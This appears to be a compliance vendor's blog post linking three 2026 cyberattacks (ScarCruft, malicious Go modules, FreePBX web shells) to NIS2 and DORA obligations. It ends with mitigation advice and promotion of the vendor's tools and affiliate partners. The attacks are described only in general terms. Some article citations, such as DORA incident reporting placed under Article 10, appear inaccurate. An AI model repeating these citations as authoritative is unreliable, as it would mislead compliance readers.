2026 Cybersecurity Incidents: NIS2 & DORA Compliance Lessons from ScarCruft, Go Modules & Sangoma

Introduction: Cybersecurity Incidents as Compliance Wake-Up Calls

The cybersecurity landscape of 2026 has been marked by sophisticated attacks that exploit both technological vulnerabilities and human factors. Incidents like the ScarCruft campaign leveraging Zoho WorkDrive to breach air-gapped networks, the proliferation of malicious Go modules designed to steal passwords and deploy backdoors, and the compromise of Sangoma FreePBX systems via web shells are not just technical failures—they are compliance failures. For organizations operating in the EU or within the financial sector, these events directly highlight gaps in meeting the mandates of the NIS2 Directive (Directive (EU) 2022/2555) and the Digital Operational Resilience Act (DORA, Regulation (EU) 2022/2554). This post analyzes these incidents to extract actionable lessons for strengthening cybersecurity posture and achieving regulatory compliance.

Detailed Analysis of Key 2026 Cybersecurity Incidents

1. ScarCruft Attack: Exploiting Zoho WorkDrive to Breach Air-Gapped Networks

The ScarCruft advanced persistent threat (APT) group, linked to North Korea, executed a campaign targeting organizations with air-gapped networks—systems physically isolated from the internet for maximum security. The attackers compromised Zoho WorkDrive, a cloud collaboration platform, by injecting malicious code into legitimate software updates. Employees unknowingly downloaded tainted updates onto internet-connected systems, which then served as bridges to exfiltrate data from air-gapped networks via USB devices or internal network pivoting.

Key Compliance Gaps Exposed:

• Supply Chain Security: Failure to vet third-party software updates, a core requirement under NIS2's supply chain security provisions and DORA's third-party ICT risk management.
• Access Controls: Inadequate segmentation between internet-facing and air-gapped systems, violating the principle of least privilege.
• Incident Detection: Lack of monitoring for anomalous data transfers from isolated networks, hindering timely response.

2. Malicious Go Modules: Stealing Passwords and Deploying Backdoors

Attackers uploaded malicious packages to public Go module repositories, mimicking popular legitimate libraries. Developers inadvertently included these dependencies in their applications, leading to:

• Credential theft from environment variables and configuration files.
• Deployment of persistent backdoors enabling remote access.
• Data exfiltration to attacker-controlled servers.

This incident underscores the risks in open-source software supply chains, where a single compromised module can cascade across thousands of projects.

Key Compliance Gaps Exposed:

• Vulnerability Management: Lack of processes to verify the integrity of third-party code dependencies, contravening NIS2's risk management measures.
• Data Protection: Failure to secure sensitive credentials, violating DORA's requirements for protecting critical data.
• Third-Party Risk: Insufficient oversight of software supply chains, a focal point in both NIS2 and DORA.

3. Sangoma FreePBX Web Shell Compromise

Attackers exploited unpatched vulnerabilities in Sangoma FreePBX, a widely used telephony system, to install web shells—malicious scripts that provide remote administrative access. This allowed:

• Eavesdropping on voice communications and call metadata.
• Lateral movement within corporate networks.
• Deployment of ransomware or additional malware.

The compromise affected numerous organizations, highlighting the dangers of unmaintained internet-facing systems.

Key Compliance Gaps Exposed:

• Patch Management: Delayed application of security updates, failing NIS2's mandate for proactive risk mitigation.
• Incident Reporting: Lack of procedures to report such breaches within the stringent timelines required by NIS2 (24-hour early warning, 72-hour notification) and DORA.
• System Resilience: Inadequate measures to ensure continuous operation during attacks, contrary to DORA's digital operational resilience objectives.

Mapping Incidents to NIS2 and DORA Requirements

These incidents vividly illustrate where organizations often fall short of specific regulatory mandates. Below is a mapping of each attack vector to corresponding NIS2 and DORA obligations.

NIS2 Directive Compliance Gaps

The NIS2 Directive, which EU member states must transpose by 17 October 2024, applies to essential and important entities across sectors like energy, transport, health, and digital infrastructure. Key requirements relevant to these incidents include:

• Risk Management Measures (Article 21): All three incidents reveal deficiencies in identifying, assessing, and mitigating cybersecurity risks. For example, the ScarCruft attack shows poor network segmentation, while the Go module issue reflects inadequate software vetting.
• Incident Reporting (Article 23): The Sangoma compromise underscores the need for robust reporting mechanisms. NIS2 requires early warning within 24 hours and a detailed notification within 72 hours of becoming aware of a significant incident.
• Supply Chain Security (Article 21): The ScarCruft and Go module attacks directly implicate third-party risks. NIS2 mandates assessing and ensuring the cybersecurity of supply chains and service providers.
• Management Accountability (Article 20): These breaches suggest a lack of top-down governance, as NIS2 holds management bodies responsible for overseeing cybersecurity risk management.

DORA Regulation Compliance Gaps

DORA applies to financial entities (e.g., banks, insurers, payment institutions) from 17 January 2025. Its requirements align closely with these incidents:

• ICT Risk Management Framework (Article 5): The Go module and Sangoma attacks demonstrate gaps in policies for managing ICT risks, including vulnerability and patch management.
• Incident Reporting (Article 10): Similar to NIS2, DORA requires prompt reporting of major ICT-related incidents to relevant authorities.
• Digital Operational Resilience Testing (Article 24): The ScarCruft breach of air-gapped networks indicates insufficient testing, such as threat-led penetration testing mandated by DORA, to uncover hidden vulnerabilities.
• Third-Party ICT Risk Management (Article 28): All three incidents involve third-party components (Zoho WorkDrive, Go modules, FreePBX). DORA requires rigorous due diligence and continuous monitoring of third-party ICT service providers.

For a broader perspective on regulatory alignment, see our guide on AI governance in emerging technologies, which touches on overlapping security themes.

Recommended Mitigation Strategies for Compliance

To address the gaps highlighted by these incidents and ensure compliance with NIS2 and DORA, organizations should adopt the following strategies:

1. Implement Zero-Trust Architectures

Move beyond traditional perimeter-based security. Zero-trust principles—verify every access request, assume breach, and enforce least privilege—could have mitigated the ScarCruft attack by preventing lateral movement from compromised systems to air-gapped networks. This aligns with NIS2's emphasis on robust access controls and DORA's focus on resilience.

2. Strengthen Supply Chain Security

Develop formal processes for vetting third-party software and services:

• Conduct regular audits of suppliers' security practices.
• Use software composition analysis tools to detect malicious dependencies, as seen in the Go module incident.
• Require compliance certifications (e.g., ISO/IEC 27001) from critical vendors.

This directly supports NIS2 Article 21 and DORA Article 28 requirements.

3. Enhance Incident Response Capabilities

Establish clear procedures for detecting, responding to, and reporting incidents:

• Train employees on recognizing threats (e.g., phishing that may lead to breaches like Sangoma's).
• Implement security information and event management (SIEM) systems for real-time monitoring.
• Practice incident response drills to meet NIS2's 24/72-hour reporting deadlines and DORA's notification rules.

4. Regular Audits and Continuous Monitoring

Conduct periodic cybersecurity assessments, including:

• Vulnerability scans and penetration testing, especially for internet-facing systems like FreePBX.
• Reviews of access logs and network traffic for anomalies.
• Compliance checks against NIS2 and DORA frameworks using tools like AIGovHub's cybersecurity compliance monitoring platform, which helps track regulatory requirements and identify gaps.

5. Foster a Culture of Security Awareness

Human error often underpins breaches. Regular training on topics like safe software downloads (relevant to the Go module incident) and phishing awareness can reduce risks. This supports the 'People' aspects of frameworks like NIST CSF 2.0's Govern function, which is referenced by many regulators.

For technical solutions, consider affiliate partners like CrowdStrike for endpoint detection and response (EDR) to combat threats like ScarCruft, or Zscaler for zero-trust network access to secure remote connections. Always verify current pricing with vendors.

Conclusion: Proactive Governance is Key to Compliance

The ScarCruft, malicious Go module, and Sangoma incidents of 2026 serve as stark reminders that cybersecurity is not just a technical issue but a compliance imperative. Under NIS2 and DORA, organizations face stringent requirements for risk management, incident reporting, and supply chain security—areas where these attacks exposed critical weaknesses. By adopting mitigation strategies such as zero-trust architectures, rigorous third-party vetting, and enhanced monitoring, businesses can not only defend against similar threats but also demonstrate adherence to evolving regulations. Proactive governance, supported by continuous compliance tracking, is essential for resilience in an increasingly hostile digital environment.

Key Takeaways:

• Air-gapped networks are not impervious; supply chain compromises, as seen in the ScarCruft attack, can bridge isolation gaps, highlighting the need for NIS2/DORA-aligned third-party risk management.
• Malicious software dependencies, like the Go modules, underscore the importance of vulnerability management and software integrity checks mandated by both regulations.
• Incidents like the Sangoma web shell compromise reveal gaps in patch management and incident reporting, directly contravening NIS2's timelines and DORA's resilience requirements.
• Mitigation requires a holistic approach: zero-trust models, employee training, regular audits, and tools for continuous compliance monitoring.
• Organizations should verify specific timelines for NIS2 transposition and DORA application, as deadlines may vary by jurisdiction or entity type.

To stay ahead of these challenges, leverage AIGovHub's cybersecurity compliance toolkit to monitor NIS2, DORA, and other framework requirements in real-time. Our platform helps you identify gaps, automate reporting, and ensure your organization is prepared for the next threat. Some links in this article are affiliate links. See our disclosure policy.

This content is for informational purposes only and does not constitute legal advice.